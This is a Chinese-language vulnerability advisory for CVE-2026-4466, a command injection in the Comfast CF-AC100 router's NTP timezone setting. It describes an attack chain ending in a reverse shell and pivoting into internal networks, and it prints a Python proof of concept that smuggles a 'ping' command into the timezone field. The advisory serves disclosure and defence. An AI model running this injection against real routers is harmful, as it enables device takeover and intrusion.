CVE-2026-4466 Comfast CF-AC100命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-4466

漏洞类型

命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Comfast CF-AC100

漏洞概述

Comfast CF-AC100 路由器固件版本 2.6.0.8 中的 mbox-config 组件存在命令注入漏洞。该漏洞位于处理 NTP 时区配置的接口处，由于缺乏严格的输入验证，攻击者可向 ntp_timezone 参数注入特殊构造的恶意指令。尽管利用该漏洞需要高权限，但一旦攻击成功，即可在底层操作系统中执行任意系统命令。这不仅可能导致敏感信息泄露，还会破坏系统的完整性和可用性，使攻击者获得设备控制权，进而对内部网络构成进一步威胁。厂商目前尚未对此漏洞做出响应。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection）。问题出在 Comfast CF-AC100 设备的 Web 管理接口 /cgi-bin/mbox-config 中。当管理员通过 Web 界面配置 NTP（网络时间协议）时区时，前端会将用户提交的 section=ntp_timezone 及相关参数传递给后端的 CGI 脚本进行处理。后端程序未对用户输入的时区参数进行有效的过滤或转义，直接将其拼接到系统命令（如 date 或 ntpdate 命令）中执行。攻击者可以利用 Shell 元字符（如 ;, |, &, ` 等）切断原有命令逻辑，并追加执行攻击者指定的任意命令。虽然 CVSS 评分要求高权限（PR:H），这意味着攻击者通常需要先通过 Web 登录界面获取管理员权限，但在获得权限后，利用过程非常简单。攻击者只需发送包含恶意 payload 的 HTTP 请求即可触发漏洞。由于该设备通常位于网络边界，一旦被攻陷，攻击者可获得 Root 权限 Shell，进而将设备作为跳板攻击内网。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别出存在漏洞的 Comfast CF-AC100 设备及其 Web 管理接口。

STEP 2

获取凭证

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他漏洞获取管理员登录凭证。

STEP 3

发送恶意请求

攻击者携带管理员会话向 /cgi-bin/mbox-config 发送 POST 请求，在 ntp_timezone 参数中注入 Shell 命令。

STEP 4

执行命令

后端 CGI 脚本解析参数并执行系统命令，注入的恶意命令被服务器以 Root 权限执行。

STEP 5

建立控制

攻击者通过反弹 Shell 或下载恶意木马，完全控制路由器，并以此为跳板渗透内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_ip = "192.168.10.1"  # Replace with actual target IP
url = f"http://{target_ip}/cgi-bin/mbox-config"

# The vulnerable endpoint is 'ntp_timezone' within the 'SET' method
# Payload attempts to inject a command using a semicolon
malicious_payload = "Asia/Shanghai; ping -c 4 192.168.1.100" # Example: ping back to attacker

# Prepare the data payload
data = {
    "method": "SET",
    "section": "ntp_timezone",
    "timezone": malicious_payload  # Injection point
}

# Note: PR:H implies authentication is required.
# You would need to provide a valid session cookie or token here.
cookies = {
    "admin_session_id": "<VALID_COOKIE_OR_TOKEN>"
}

try:
    response = requests.post(url, data=data, cookies=cookies, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check for command execution effects.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Comfast CF-AC100 2.6.0.8

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议管理员暂时关闭设备的 Web 管理接口，仅通过本地串口或 CLI 进行必要维护。同时，应密切监控路由器的系统日志和网络流量，检测是否存在针对 /cgi-bin/mbox-config 接口的异常请求或未知的系统进程调用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4466
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4466
3 Details https://www.cvedetails.com/cve/CVE-2026-4466/
4 VulDB https://vuldb.com/cve/CVE-2026-4466
5 Link https://github.com/jinhao118/cve/blob/main/ComFast%20CF-AC100-V2.6.0.8_2.md
6 Link https://vuldb.com/?ctiid.351756
7 Link https://vuldb.com/?id.351756
8 Link https://vuldb.com/?submit.772874